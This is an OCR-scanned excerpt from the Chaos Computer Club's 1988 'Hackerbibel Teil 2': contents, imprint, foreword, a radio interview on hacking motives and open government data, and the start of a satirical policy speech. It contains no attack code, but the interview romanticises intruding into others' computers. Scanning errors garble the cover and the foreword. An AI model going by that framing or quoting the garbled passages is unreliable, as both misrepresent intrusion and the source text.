Skip to main content

Full text of "Die Hackerbibel - Teil 2"

See other formats


Ws^ 




CHAOS COMPUTER CLUB 



6111 ep/ 


















































































































































































































































































































































































































































































































































































































































































































































































































































































HACKER BIBEL 2 

DAS NEUE fESTAMENf 


Q 

\aMa/ 

HUnniiE SOFTURRE FÜR HERZ. HRHO B RIRü 


DER GRÜNE ZWEIG I24 




. Inhack 

10 Daten raus - umsonst und sofort 
12 Bericht zur Lage der Nation 
17 Chaos Talks 

23 eVorstöndliche Abmahnung wg. Schaum 

29 Indianerspielzu Ende 

31 Daten - Aufzucht und Pflege 

35 Funkbastler 1936 

42 Geburtstag: 40 Jahre Transistor 

44 Parlakom schachmatt 

46 Liebeskranker Roboter 1932 

47 Technik in die Schranken (Weizenbaum-Interview) 

52 WELL - ein guter Datenbrunnen 

54 Soviet Computer Technology 
59 Minus Delta Talks 
78 Freedom of Data Processing 
84 Phonetapping 
86 Geht den Damen ein Licht auf? 

89 Interview mit Deborah L Brecher 

91 Computer Lib 

92 Ein positives feministisches Modell 

94 Ich hob auf DV-Fachfrau umgeschult 
96 Ein Mailboxbetreiber erzählt 
106 Elektronische Roll-Nomaden 
110 Batch-Magic 
114 Fun, Profit and Global Suicide 
116 Tabellen: Satelliten-Info von Info-Sat 

122 Telcom-History 1966 

123 Strahlende Computer 

126 Sachverständige Äußerung 
128 Programmiererdoping 
130 Babyboomers and Cyberpunks 
134 Megabrain 

140 Datenschleudern von 13 bis 25 - nachdrücklich empfohlen 



disiM 



ab: 

13 


14 

15 


16 


17 

18 

19 

20 


21 

22 


23 


24 


25 


140 Datenschleudern von 13 bis 25 — nachdrücklich empfohlen 

141 Hacker im Europaparlament 

144 Heyne Halbschnellschuß (Buchrezension) 

144 COSY (Cursor Operating System) 

145 Die Katze darf das! 

146 Wohin steuert die Welt7(wolstderAbfluB?ciSä) 

146 Chaos Communication Congress 

147 The Kids Can't WaitI 
150 Viromat plus 

150 Telecontrol - wie geht das7 (mit ’ner Ferr^euetung; d. Säzzer) 

151 Trara - die Post ist da! (hoch aufdem gelben Wagen dSä) 

151 Kinder sind Chaoten 

153 2. Wirtschaftskriminalitätsgesetz (Forts. 16:163) 

157 Mailboxen sind nicht totzukriegen 

158 Hackers von Steven Levy 

168 Buchwarnung: M3DOS im Detail 

159 Btx-Kostensteigerung; Btx für C—64 und BIM 
1 59 Hilfe, Hacker (oh Big BrotherdSä) 

160 Security against Hackers (gipsnichdSä) 

161 Satzung des Chaos Computer Club eV 

162 EARN / BitNet runtergefahren7! 

162 Mailbox und Btx 

167 CCC - Partner auf dem Weg zur Informationsgesellschaft (ötB) 

169 Virus RushHour 

170 Laserbrief & Antwort (Stichwort Elite etc.) 

1 71 Strahlengefahr aus dem Telefon7 (auch 17:177) 

1 72 Entwicklungshilfe: Chaos-Dienstreise nach Graz 
173 Postmodemballade 

176 Datex-P: Auslösung (Auflösung?! dSö) 

177 Virusartikel in fünf Teilen aber einer Ausgabe 

182 Volkszählungsreanonymisierung (auch 18:187) 

183 Fake-Bombe auf dem Chaos Communication Congress 

191 Artware 

192 waschmaschinenfester Personalausweis 

194 GfA-Basic Prüfsummenprogramm für waschmaschinenfesten 
196 Erbsubstanz in der Rasterfahndung 
177' Der magische Schalter 

198 Real Programmer's don't use PASCAL(f 2 i: 208 , 22 ; 2 i 9 ) 

200 Datenbankkontrolle in USA 
203 Die Quatschexplosion (Lesehitfezu 22 : 212 ) 

208 Rechtliche Aspekte von Computerviren 

213 SPANet 

214 Die Knust und ihre Knüstler: documenta 8 (vgi. 22 : 216 ) 

215 Telex via Btx 

216 Btx-Softwaredekoder für PC 's 
218 Brief aus Kairo (sehr versandet dSä) 

223 Bits, Bugs und Vaxen 

224 Die aktuellen Tarife für's Hacken (s. 24:241) 

231 Raubkopien (s. 24:242) 

236 NASA, BkA, Betrachtungen 

239 Schmelzfeste Schokolade (Boupiäneabgestü4er Ufos) 

243 Computerbetrug am Automaten 

244 Münzprüfer (draufbelßen.dSö) 

248 VAX-Encryption 

249 Geheime Nachrichtentechnik und privater Nachrichtenschutz 

251 EARN: Erstes Außerirdisches Regional Netz 

252 Modemanschluß 

253 Argentinische Hacker 



Impressum 


Die Hackerbibel Teil 2 
Der grüne Zweig 124 

Redaktion: Werner Pieper und Henvart Holland-Moritz 
Redaktion Daienschleuder 
Schwenckestraße SS 
D-2000 Hamburg 13 
Datex-P: Geol ;Chaos-Team 
BTX:“Chaos 

Satz:Bu(dimaschine Heidelberg und WYSIWYG 
Gestaltung: Ronald Rippchen & Wau 
Illustrationen: Wenn nichtanders angegeben Chaos Realitätsdienst 
Covergestaitung vorn: Maii & Werner 
Druck: Fuldaer Verlagsgesellschaft 


Herausgegeben von Herwart Holland - Moritz 
Verlegt von der Grünen Kraft - Medienexperimente 
Werner Pieper - D - 6941 Löhrbach 


ISBN 3-925817-24-7 


Die in diesem Buch veröffentiichten Beiträge sind urheberrechtlioh geschützt. Alle Rechte, insbesondere das der Übersetzung in fremde Sprechen, Vorbehalten K ■ 
Teil dieses Buches darf ohne schriftliche Gehnehmigung des Verlages in irgendeiner Form - durch Fotokopie, Mikrofilm oder andere Verfahren - reproduziert oder 
eine von Maschinen, insbesondere von Datenverarbeitungsanlagen, verwendete Sprache übersetzt werden. ^ 'h 

Auch die Rechte der Wiedergabe durch Vortrag, Funk- und Fernsehsendungen, im Magnettonverfahren oder ähnlichen Wege bleibt Vorbehalten. 

Fotokopien für den persönlichen und sonstigen Gebrauch dürfen nur von einzelnen Beiträgen oder Teilen daraus nur als Einzelkopien hergestellt werden. Jede im 
Bereich eines gewerbicihen Unternehmens hergestellte oder benützte Kopie dient gewerblichen Zwecken gern § 54 (2) UrhG und verpflichtet zur Gebührenzahlun 
an die VG WORT, Abteilung Wissenschaft, Goetherstraße 49, D-8000 München 2, von der die einzelnen Zahlungsmodalitäten zu erfragen sind. ® 

Für elektronische Informationssysteme (Mailboxen usw.) gelten grundsätzlich unsere in GEONET veröffentlicheten Verbreitungsbedingungen. 

Bei Erwerb, Errichtung und Betrieb von Empfängern, Funksprechgeräten, drahtlosen Mikrofonen und anderen Funkanlagen, sowie Telefonen und 
Datenübertragungsgeräten und - nicht zu vergessen - Computern, insbesondere bei Eingriffen in das Postnetz in der Bundesrepublik Deutschland sind die oelterri» 

gesetzlichen und postalischen Bestimmungen zu beachten. ’ 


Für Bauanleitungen, Schaltungen und Programme in der Hackerbibel Teil 2 zeichnen die Verfasser bzw. Entwickler verantwortlich. Die Redaktion hat die 
Manuskripte, Schaltungen und Programme mit gröQter Sorgfalt (auch juristisch) geprüft, kann aber für Fehler im Text, in Schaltbildern, Aulbauskizzen Stücklisten 
Programm-Listings usw., die zum Nichtfunktionieren oder evtl, zum Schadhaftwerden von Bauelementen, Anwendern sowie toter und lebender Materie'führen weder 

eine juristische Verantwortung noch irgendeine Haftung übernehmen. 

Sämtliche Veröffentlichungen in der Hackerbibel Teil 2 erfolgen ohne Berücksichtigung eines eventuellen Patentschutzes, auch werden Warennamen ohne 

Gewährleistung einer freien Verwendung benützl. 


impress.bm 



Vonuörter, 9{gtfi7Veise 
und ‘Danf^sagunßen 

‘trotz der nun schon ktiapp ein Jahr andauernden unverständCichen ‘Be- 
scfdoßncdimunßen von redafctionedem. 9dateriaC von datenschCeuder und Jdah: 
herhiSeC konnte dieses Werhi jetzt — wenn auch verspätet — fertißßesteCCt 
werden. 

ZucdCererst ßiCt unser (Dank^ den J^reundlnnen des Chaos Computer CCuB, 
ohne die der JdaBi zweiter ‘TeiC so nicht hätte vollendet werden können. 

Qpasi stellvertretend erwähnt sei iHerr Äckermann, dessen Juristische Bei¬ 
träge — gerade zur ‘Virendiskussion — in verschiedene ‘Datenschleuder-Är- 
tikel eingingen, ohne daß er korrekt namentlich genannt wurde. 

‘Weiter danken wir der Zeitschrift ‘Whole Barth B^'Oieu) (27 Qate S 
‘Rpad, Sausalito, CÄ 9496S ‘ILSÄ) sowie dem Besten Buchkgtalog der ‘Welt, 
Loompanics (Bßtalog c/o üdedieneT^perimente, 6941 LöhrBach) für permanen¬ 
te Inspiration. 

‘Die taz sorgte für üBerraschende LkhtBlicke - gerade auf der Ifrauen- 
seite — und aus vielen weiteren Quellen lourde mit freundlicher Qenehmi- 
gung geschöpft. 

‘Wir danken Jlerm Schumacher unBekannterweise; für Interviews mit ^liss 
dem ‘P9d-Computerheft, mit ‘WeizenBaum Info 3, mit ‘Timothy Leary Bplling 
Stone; ‘Eva Blumenfeld und päd.eKtr(t pBus demokratische erziehung, Udagkal 
Blend und Odichael Jüitchinson für üdegoBrain-Infos, Infosat — dem 9daga- 
zin für den freien SÄ‘T-‘TV-'Empfang, Trofessor 9dolzBerger von der Univer¬ 
sität der Bundeswehr und Carola Schewe (deren ‘Ergänzungen zu .Strahlen¬ 
de Computer“ leider zu spät kamen) und nicht zuletzt Michael Qreen für 
die UmscfdaginnenBilder aus dem wunderschönen Buch „The Zen Ärt cf 
Macintosh". 

OBwohl ‘Verleger und JlerausgeBer sich nachdrücklich Bemüht haBen, die 
erforderliche MgchidruckerlauBnis edler zitierten ‘Werke und Benutzten äBBU- 
dungen einzuholen, ist es uns nicht gelungen, alle B^hteinhaBerlnnen aus¬ 
findig zu machen. Sofern diese uns davon in E/nntnis setzen, werden wir 
sie selBstverständlich gerne in zukpiftigen Äuflagen als J(echteinhaBerInnen 
geBührend ausweisen. 



LöhrBach / MeidelBerg, Juli 1988 




Daten raus - umsonst und sofort 

Zwei Stunden lang kommen täglich von 10 bis 12 auf SDR3 interessante 
Leute zu Wort wie der Hamburger Sexualwissenschaftler Wawerzonnek 
mit seiner These vom,,multiplen Orgasmus“. Am 4. Juni 1988 waren vom 
CCC Andy aus Hamburg und Bernd aus Heidelberg zu Gast bei Moderator 
Stefan Silier. In der zweiten Stunde ging es um social hacking. 


M: Andy und Bernd, ihr gehöil zum Chaos Computer Club. 
Dieser Club macht unter anderem dadurch Schlagzeilen, 
daß er so etwas wie das Eindringen in die NASA-Computer 
an die Öffentlichkeit bringt. Macht ihr das, um der NASA zu 
helfen? Paßt mal da auf, daß das nicht wieder passiert? 

A: Da gibt es unterschiedliche Motivationen. Einmal gibt es 
die Motivation des Hackers, der macht das aus Spaß. Es ist 
natürlich auch ein Machtgefühl, wenn man mit seinem 500 
Marks-Heimcomputer im Wohnzimmer sitzt und weiß, in den 
Staaten steht irgendwo ein Rechner und da ist man jetzt 
drin, da bewegt man jetzt auf einer Platine ein paar Bits 
umher. Das ist schon ein Wahnsinnsgefyhl. Unsere Moti¬ 
vation, Schwachsteilen aufzudecken bringt uns auch Pro¬ 
bleme. Uns wird auch vorgeworfen, dieTrütfelschweineder 
Software-Industrie zu sein, unter dem Motto; Wir nutzen 
unser Wissen aus, um die Welt dicht zu machen. Da müssen 
wirdifferenzieren; Wir wollen jetzt nicht irgendwie die totale 
Zugangskontrolle. Wir setzen einen ganz klaren Unter¬ 
schied zwischen den Datenbereichen zum Beispiel des 
Militärs, die wie wir meinen, geschützt sein müssen. Auf der 
anderen Seite gibt es die Datenbanken, die für jedermann 
zugänglich sein sollten. Da fordern wir weltweiten freien 
Informationsfluß. 

M; Zu welchen Datenbanken zum Beispiel? 

A: Da gibt es viel Forschung, zum Beispiel Bioforschung. 
M; Von privaten Firmen? 

A: Von privaten Firmen, aber nicht nur. Auch von staatlicher 
Seite. 

M: Die sagen natürlich: Wir stecken unser Geld da rein, das 
ist unsers. 

A; Für die staatliche Seite haben wir das so formuliert: Wir 
fordern die maschinenlesbare Regierung. Mit Hilfe derCom- 
puter und der Netzwerke ist so was einfach möglich. Da¬ 
durch ist es möglich, Daten transparent zu machen. Diese 
Technologie existiert dazu. Es ist nur die Frage, wie sie 
eingesetzt wird. 

B: In dieser Beziehung sind die Bundesrepublik oder große 
Teile von Europa wirklich noch Entwicklungsland. Seit1974 
gibt es in Amerika das ,,Freedom of Information Act“, das 
jeder Person in den USA erlaubt, Daten, die von der Öf¬ 
fentlichkeit in Regierungsstellen fließen, auch wieder ab¬ 
zufordern. Das beinhaltet Volkszählungsdaten, das bein¬ 
haltet aber auch Observationen. In den USA ist es sogarso, 
daß wenn man observiert wird und es mitbekommt, wie das 
bei der Joan Baez mal der Fall war, daß sie ihr gesamtes 
Dossier auf Grund des ,,Freedom of Information Act“ vom 


CIA zurückfordern konnte und daß ein Recht auf Einsicht in 
Umweltakten besteht. Es wird ja auch hier in der Bundes¬ 
republik registriert, welche Firmen weiche Stoffe wo ein¬ 
leiten und mit welcher Berechtigung. Diese Daten werden 
uns vorenthalten. Und der Ansatz, der jetzt mittlerweile auch 
von den Grünen und von derSPD gefordert wird, ist ein guter 
Ansatz, nämlich Einsicht in die Umweltakten. Es ist ja ganz 
klar: Handeln tut man auf Grund von Informationen; wer 
keine Informationen über die Welt hat, ist nicht In der 
Lage, ln dieser Welt richtig zu agieren. Insofern ist es in 
einer Demokratie unumgänglich, daß alle Daten, die von der 
Regierung produziert oder von der Regierung gesammelt 
werden, der Öffentlichkeit auch wieder zugänglich gemacht 
werden. 

M: Aber das ist ein sehr zweischneidiges Schwert. Bei 
manchen Daten kann ich mir vorstellen, daß es sinnvoll ist, 
wenn die Öffentlichkeit, wenn jeder Zugang zu diesen Daten 
hat. Bei anderen würde ich doch sehr den Datenschutz in 
den Vordergrund stellen. 

A: Das sagen wir ja auch vollkommen klar. Wir fordern ja 
auch überhaupt nicht, daß zum Beispiel der militärische 
Abschirmdienst alleDaten, die er hat, auf den Tisch legt. 

M: Meine persönlichen Daten sind ja auch was weiß ich 
üloerail gespeichert - bis zur Krankenkasse. Da will Ich doch 
nicht, daß irgendjemand, der zufällig in dieses System 
reinkommt, erfährt, wann ich an welcher Krankheit gelitten 
habe.. . 

A: Richtig, das ist vollkommen verständlich. Da setzen wir 
uns auch gar nicht dafür ein, daß diese Daten nun jeder 
bekommt. Aber im Moment ist es so, daß eigentlich alles 
gesichert wird - und das auch mehr schlecht als recht- und 
das ist, meinen wir, nicht der richtige Weg. 

B: Man kann es ganz einfach definieren: Die Daten, die die 
Öffentlichkeit betreffen, müssen auch der Öffentlichkeit 
zugänglich gemacht werden. Wenn jetzt jemand sagt, er 
muß eine neue Umgehungsstraße bauen aus den und den 
Gründen, weil sich das zum Beispiel aus der Volkszählung 
ergibt, dann muß es doch auch möglich sein, daß diese 
Daten, auf Grund derer Regierungsentscheidungen ge¬ 
troffenwerden, nachprüfbar sind. Diese Nachprüfbarkeit 
ist ein wesentliches Element der Demokratie und un¬ 
serer freiheitlich demokratischen Grundordnung, daß Re¬ 
gierungsentscheidungen kontrollierbar sein müssen. 

M: Aber das ist ja jetzt nichts, was sich jetzt erst durch das 
Computerzeitalter ergeben hätte. Man könnte die Regie¬ 
rung ja auch dazu verpflichten, das in irgendeinem Buchzu 
veröffentlichen, ansonsten steht jeder ohne einen Com¬ 
puter außen vor. 





A: Das ist richtig, aber die Entwicklung weist ja in Richtung 
elektronische Medien. Zum Beispiel: Die Bundesregierung 
ist auch Anbieterin im BTX-System. Und was sie da an 
Informationen bietet, ist - ich sag jetzt mal meine Meinung 
-eine Frechheit. Da kommt eigentlich nichts rüber, obwohl 
im Bildschirmtext die Möglichkeit besteht, daß jeder Bürger, 
der an dieses Bildschirmtextsystem angeschlossen ist, In¬ 
formationen über irgendwelche Verhandlungen bekommt. 
Die technischen Voraussetzungen sind da und manchmal 
nicht da. Insofern ist es schon verständlich, aber auf Pa¬ 
piermedium ist das alles kompliziert und vor allem teuer. 
Aber auf den elektronischen Medien ist das sehr einfach, 
sehr billig und es könnte eingesetzt werden. 

M: Aber nicht demokratisch, weil nicht jederso ein Ding hat. 

B: Da wollt ichgrad noch mal drauf eingehen. Wir sind daran 
gewöhnt, daß es überall diese kleinen gelben Häuschen 
gibt, in denen man telefonieren kann. Wieso ist es so 
unvorstellbar, daß es gelbe Häuschen mit einem Computer 
drin gibt, wo man seine 5 Mark oder wieviel auch immer 
reinwirft, und dann die Möglichkeit hat, auf die Daten zu¬ 
zugreifen. Man muß ja den Computer nicht selbst besitzen. 

A: Das wollen wir an dieser Stelle auch mal klarsfeilen: Wir 
sind für eine Verkabelung der Welt. Aber über das Wie und 
Warum müssen wir uns noch mal unterhalten. 

M: Ihr habt eben gesagt, wir fordern die Verkabelung der 
Welt. Unabhängig davon, ob ihr das fordert, wird es dazu 
kommen - der Weg dort hin ist wohl vorgegeben. Aber das 
eröffnet ja nun auch vielen unangenehmen Begleiter¬ 
scheinungen Tor und Tür, wie zum Beispiel Wirtschafts¬ 
kriminalität. Auf 15 Milliarden schätzt man jetzt schon den 
jährlichen Schaden. Und je mehr Leute sich ins Kabel 
hängen, desto größer ist die Wahrscheinlichkeit, daß ma¬ 
nipuliert wird. Wir haben von dem Börsenmakler bei VW 
gehört, das ist ja auch über den Computer gelaufen. Läßt 
sich sowas nicht verhindern, wenn die Sicherungen mal so 
gut werden, daß sowas nicht mehr passiert? 

B: Dies ist meiner Meinung nach einfach unwahrscheinlich, 
weil die Systeme von Menschen konzipiert werden, von 
Menschen betrieben werden und damit ganz einfach vom 
Prinzip her nicht sicher gemacht werden können. Das ist 
aber auch gar nicht so sehr der Ansatzpunkt. Wenn wir wie 
Andy vorhin, von der Verkabelung der Welt reden, meinen 
wir damit nicht so sehr, daß sich alle Wirtschaftsunterneh¬ 
men verkabeln, sondern wir haben eine ganz andere Per¬ 
spektive, daß nämlich die Linken, sage ich jetzt mal so 
generell, sich eher technikfeindlich verhalten und es nicht 
begreifen, daß Computer für sie ein Medium sein können, 
das sie sehr sinnvoll einsetzen können. Um mal einer! 
Begriff von Robert Jungk zu benutzen; Wir sind im Chaos 
Computer Ciub eine Zukunftswerkstatt. Wir denken über 
die Zukunft nach, über das, was man machen kann, um die 
Zukunft lebenswert zu gestalten. Und mittlerweile - zum 
Glück, kann man da sagen - begreifen auch die Bürgeri¬ 
nitiativen, daß sie Computer einsetzen können für ihre 
eigenen Zwecke. Es gibt heute beispielsweise schon 
computer-überwachte Atomanlagen, wo die Bürgerinitiati¬ 
ven Meßgeräte aufbauen, die Daten sammeln und dann 
über Computer weitergeben. Und die Idee, die jetzt in 
München geboren wurde, ist, daß man alle Bürgerinitiati¬ 
ven, die sich mit Umweltschutz beschäftigen, miteinander 
vernetzt. Dazu muß man sagen: so positiv dieser Ansatz 
eigentlich ist, so verkennt er doch, was ein Computernet¬ 
zwerk ist. Der Computer im Netzwerk ist ein Strukturver¬ 
stärker, so will ich das mal nennen. Das heißt, er verstärkt 
eigentlich nur vorhandene Sozialstrukturen. Wenn Leute, 
die in ganz verschiedenen Städten sitzen, schon so nicht 


miteinander auskommen und nicht miteinander reden kön¬ 
nen, dann werden sie das mit dem Computer noch viel 
weniger können und es wird in die Katastrophe führen. 
Insofern muß, bevor da ein gutfunktionierendes und effi¬ 
zientes Computernetz installiert wer den kann, zuerst die 
notwendige Sozialstruktur geschaffen werden, damit die 
Leute dann auch in der Lage sind, den Computer sinnvoll zu 
nutzen. Das ist überhaupt ein generelles Problem, daß 
meiner Meinung nach in der Gesellschaft mit dem Computer 
so viel falsch läuft, weil der Computer sozusagen vorhan¬ 
dene Strukturen bei uns in der Gesellschaft verstärkt und - 
das muß man schon so sagen - das sind nicht immer sehr 
glückliche Strukturen. Wenn es darum geht, viel Geld zu 
verdienen und diese Struktur in der Gesellschaft da ist, dann 
verstärkt das der Computer und provoziert natürlich sowas 
wie Computerkriminalität. 

M: Im Moment noch kein sehr demokratisches Instrument, 
der Computer. 

A; Ein Computer ist weder demokratisch noch undemo¬ 
kratisch. .. 

M; Die Anwendung des Computers fördert im Moment 
noch nicht die Demokratie. 

A; Ich will jetzt nicht anfangen, von der Regierung zu reden, 
aber was da eingesetzt wird bezogen auf die Offenheit 
gegenüber den Bürgern, kann man so sehen. 

B: Die Struktur ist nicht dafür geeignet, daß der Computer 
wirklich demokratisch förderlich wäre. Es geht also zuerst 
darum, das Vorfeld zu bereiten, damit Computer für diese 
grundsätzlich demokratische Aufgabe genutzt werden kön¬ 
nen. 

M: Du hast eben konkrete Projekte angesprochen, die jetzt 
unter den sogenannten Linken laufen, bei Umweltschutz¬ 
verbänden. Versteht sich euer Blättchen, die Daten¬ 
schleuder, auch als Medium für diese Projekte? 

B: Es heißt ja, die Datenschleudeic ist das wissenschaftliche 
Fachblatt für Datenreisende. Und in dem Sinne verstehen 
wir uns als Wissenschaftler. Wissenschaftler wird man 
nicht dadurch, daß man an irgendeiner Universität 
Irgendeinen Abschluß macht, sondern Wissenschaftler 
ist der, der sich kompetent zu Sachen äußern kann. 
Dieses Wissen wollen wir sinnvoll einbringen und dazu 
benutzen wir verschiedene Medien. Das ist zum einen die 
Datenschleuder, die erscheint unregelmäßig. .. 

A:.. .in Papierform. Das ist auch wichtig. Leute, die da nicht 
irgendwie mit ihrem Computer was machen, denen das 
auch zugänglich zu machen. Die Datenschleuder versteht 
sich auch nicht so sehr als Fachblatt in dem Sinne, daß da 
die neusten technischen Dödelfazzes ausgetauscht wer¬ 
den, sondern als Informationsblatt über - na sagen wir mal 
- den Stand der Entwicklung oder so. 

B: Dann gibt es noch zusammenfassend die Hackerbibel - 
die erste Bibel mit Fortsetzung, der zweite Teil wird vor¬ 
aussichtlich zur Buchmesse verfügbar sein -, das ist eine 
Zusammenfassung von dem, was wir machen. Das ist nicht 
so sehr die Zukunftsperspektive, sondern „state of the art“, 
darzustellen, wie weit wir im Moment sind. 


(Und dann war die Sendezeit leider um... 

Für die Hackerbibel Teil 2 wurde obiges, leicht redigiertes 
Gesprächsprotokoll angefertigt) 




Dieter Schumacher 


Bericht zur Lage der Nation 
im geteilten FIZ-Deutschland 

Abstract 


Es ist nicht genug zu wissen, man muß auch an wenden; 
es ist nicht genug zu wollen, man muß auch tun. 

jQhann{W)Wolfgang(W)Goethe 


Herr Präsident, Herr Bibliotheksdirektor, 

Verehrte Körperschaften, Persönlichkeiten und Ministerialräte, 

Vertreter der Geistlichkeit und ideologieverwandter Berufe, 

Eminenzen, Resistoren, Impedanzen und Suszeptibilitäten, 

Rote und Schwarze, Realos und Fundis, 

Ruhegehaltsfähige Mitbürger und sonstige Beihilfeempfänger, 

Mittelständler und Existenzgründer, 

Liebe Online-Gemeinde! 

Unsere diesjährige ökumenische Feierstunde für Kommerzielle und Nichtkommerzielle steht wie¬ 
der unter einem Wort des Herrn (Helmut Kohl), der uns am 18.3.1987 in seiner Regierungserklä¬ 
rung zurief: Die Schöpfung bewahren - die Zukunft gewinnen - Online recherchieren! 

Die Epistel des heutigen Tages steht geschrieben in Joh. 1,1:1m Anfang war das Paßwort, und 
das Paßwort war beim Host. 

Die Kollekte am Ausgang ist bestimmt für die Hinterbliebenen derjenigen vom BMFT geför¬ 
derten IVS-Neugründungen, die nach Ablauf des Förderungszeitraums noch keine schwarzen 
Zahlen schreiben. Sie wird der Liebe der Gemeinde empfohlen. 

Dieser erste Bericht nach der Winterwahl des Jahres 1987 steht noch ganz unter den Nachwir¬ 
kungen der Regierungsbildung und des mühsamen Ausklammerns echter inhaltlicher Aussagen 
in den Koalitionsvereinbarungen. 

Während die Spitzensteuersätze und die Sicherheitsgesetze heftig umstritten waren, bestand 
Konsens darin, das laufende luD-Programm 85-88 über 1988 hinaus um weitere 4 Jahre zu ver¬ 
längern und eine Fortschreibung erst in der nächsten Legislaturperiode vorzusehen. Es sei - so 
die einhellige Meinung der Verhandlungspartner - damals meisterhaft so ausgewogen ausformu¬ 
liert worden, daß der überwiegende Teil der inhaltlichen Aussagen auch bis in die frühen 90er 
Jahre noch Bestand haben dürfte, auch bei dann veränderten Randbedingungen. 

Es sei auch der Beamtenschaft des Bundes und der Länder nicht zuzumuten, nun in Kürze 
schon wieder den Streß einer derartigen Konsensbildungsstrapaze auf sich zu nehmen, zumal 
sie vorerst auch noch für produktive Tätigkeiten zur Verfügung stehen müßten. Bis 1992 seien die 
zuständigen Damen und Herren dann hinreichend regeneriert und befördert, daß sie mit neuem 
Elan an das luD-Programm zur Jahrhundertwende gehen könnten. Auch der bisher zuständige 
verdienstvolle beamtete Staatssekretär wurde vorsorglich in den einstweiligen Ruhestand ver¬ 
setzt, damit seine luD-orientierte Dynamik diese Zeitpläne nicht unterwandert und damit er sich 
seinerseits ohne die Last des politischen Tagesgeschäfts auf die dann anstehenden Aufgaben 
konzeptionell vorbereiten kann. 

Für eine Fortschreibung erst Anfang der 90er Jahre sprach auch der Umstand, daß dann die 
aktuellen Bevölkerungsdaten aus der jetzt laufenden Volkszählung auf den Tisch liegen, daß die 
Spätfolgen des Pillenknicks überschaubar werden und daß der Bundesminister für Wirtschaft 
seine Grundsatzüberlegungen abgeschlossen hat, so daß dann Bedarfsuntersuchungen auf 
gesicherter Grundlage erstellt werden können, für welche die nachgeordneten Institute bereits 
heute Personal Vorhalten. 

Im Bereich der inneren Sicherheit soll einvemehmlich ein Vermummungsverbot beim Recher¬ 
chieren erlassen werden; die Koalitionäre sind der Ansicht, man solle nicht länger seine Freude 
über gefundene Hits der Öffentlichkeit vorenthalten. Eine Novellierung des Bundesdatenschutz¬ 
gesetzes und des Verwaltungsverfahrensgesetzes soll auf Wunsch von Minister Zimmermann 





die Zusammenarbeit zwischen den FIZen und den Sicherheitsorganen verbessern; er verspricht 
sich von einer Überwachung der Recherchenthemen Hinweise auf recherchierende Verfassungs¬ 
gegner. Schließiich wird das Gesetz über den militärischen Abschirmdienst sicherstelien, daß 
Ostblocksearcher bei uns keine SDI-Profiie plazieren. 

Der Bundesminister für Justiz mußte entgegen früheren Plänen im Amt bleiben, da er immer 
noch nicht den Eingangsdialog zu JURIS beherrscht, geschweige denn die Markteinführung. 
Ferner konnte die rechtzeitig vor der letzten Landtagswahl angekündigte Sitzung der JURIS 
GmbH nach Saarbrücken noch nicht vollzogen werden. Man hebt sich das jetzt für die nächste 
Wahl auf, um dann Anlaß für eine schöne pressewirksame Eröffnungsveranstaltung zu haben. 

Mittelbar davon betroffen ist auch der weiterhin mit Spannung erwartete Termin für den 
Besuch des Staatsoberhaupts der Deutschen Demokratischen Republik: Herr Honecker möchte 
im Saarland nämlich auch einen Blick in JURIS tun und sich einmal online veranschaulichen, was 
einen Rechtsstaat ausmacht. 

Auch der Bundesminister für Wirtschaft mußte aus luD-Gründen im Amt bleiben, weil die 
von ihm seinerzeit vergebenen luD-Studien nun noch erst implementiert werden müssen. Immer¬ 
hin hat er mit diesen Studien erreicht, daß die damit beauftragten, ihm nachgeordneten Institute 
mittlerweile Grundkenntnisse im Recherchieren erwerben konnten. Die Erhebungen der Institute 
bei den sachkundigen Privatfirmen haben dort zu einem Verdienstausfall von einigen 10.000 DM 
geführt, die steuerlich nicht als außergewöhnliche Belastungen abgesetzt werden können. 

Wie rasch der BMWi Studienerkenntnisse in Maßnahmen umsetzt, zeigt sich im Bereich der 
Informationsversorgung mittelständischer Unternehmen: Kaum hatte er erfahren, daß Mittel¬ 
ständler Informationen lieber am Stammtisch als am Terminal einholen, wurde der Beschluß 
gefaßt, den IVS des BMFT ein bundesweites Netz von Searchkneipen entgegenzusetzen. Dort 
sitzt während der Öffnungszeiten ein FIZ-Mitarbeiter mit Portable am Tresen und reicht Online- 
Records mit Pils oder Alt. Die Fakultät für Brauereiwesen der TU München in Weihenstephan 
erstellt derzeit die obligate Bedarfsanalyse. Hoppenstedt reagiert sensibel auf diese Markt¬ 
chance und bringt eine Kundenzeitschrift heraus unter dem Titel “Cogito, ergo bibamus”. 

Im Geschäftsbericht des BMZ wurde dem deutschen Volk abermals ein Minister zugemutet, 
der die Datenbanken SCAN-A-BID und CAB nicht kennt. Minister Klein feistete freilich zunächst 
einmal Entwicklungshilfe im Inland südlich des GOLEM-Äquators: Ein schon vom BMWi mit Fort¬ 
bildungsstudien betrautes Wirtschaftsforschungsinstitut in München erhielt nun auch noch ent¬ 
geltlich Gelegenheit, sich über Datenbanken mit Entwicklungsländerrelevanz sachkundig zu 
machen. 

Anders als der BMWi verfügte der BMZ jedoch zunächst eine öffentliche Ausschreibung, um 
bei den Insidern im Wege der kostenlosen Angebote Anregungen für die inhaltliche Ausgestal¬ 
tung der Studie einzuholen. In seinem Amtseifer ist es freilich dem Minister entgangen, daß bei 
einer Ausschreibung nach VOL nach herrschender Lehre keine gemeinnützigen Auftragnehmer 
bedacht werden dürfen. 

Derartigen fortgesetzten grob unbilligen Wettbewerbsverzerrungen zwischen öffentlichen und 
privaten Anbietern will der Bundesminister der Finanzen nunmehr einen Riegel vorschieben: 
Künftig wird nur noch unterschieden zwischen kommerzieilen Anbietern 1, Art (öffentliche und 
gemeinnützige Institute, die keine Ahnung von Gemeinkosten haben) und solchen 2. Art, die ehr¬ 
lich ihre Kosten ermitteln. Erstere erhalten bei Ausschreibungen pauschal einen Angebotszu¬ 
schlag von 80%. 

Nicht nur Minister Klein, sondern auch Rita Süßmuth zeigt eine zunehmende Sensibilität 
gegenüber Oniine-Diensten: Den zahlreichen Pfeifenrauchern in der Online-Szene hat sie ein 
sogenanntes Raucherterminal angekündigt, mit eingebautem Aschenbecher und Dunstabzugs¬ 
haube. Mit diesem Equipment wird einerseits den Pipe Searchern die Lust am Recherchieren 
erhalten, während andererseits die nikotinarmen Rechercheure frei von Umweltbelastungen 
ihrem Gewerbe nachgehen können. 

Sie legte ferner einen Bericht des Bundesgesundheitsamtes vor, wonach die in Onlinekreisen 
weit verbreiteten Search Aids unter epidemiologischen Gesichtspunkten unbedenklich sind. 
Diese Aids-Form kann zwar bei weniger robusten Searchern zu einer gewissen immunschwäche 
gegen bestimmte Hosts führen. Es besteht jedoch kein öffentliches Interesse daran, diesen Per¬ 
sonenkreis dagegen amtlich zu schützen. Unbeschadet dessen werden sich künftig Searcher im 
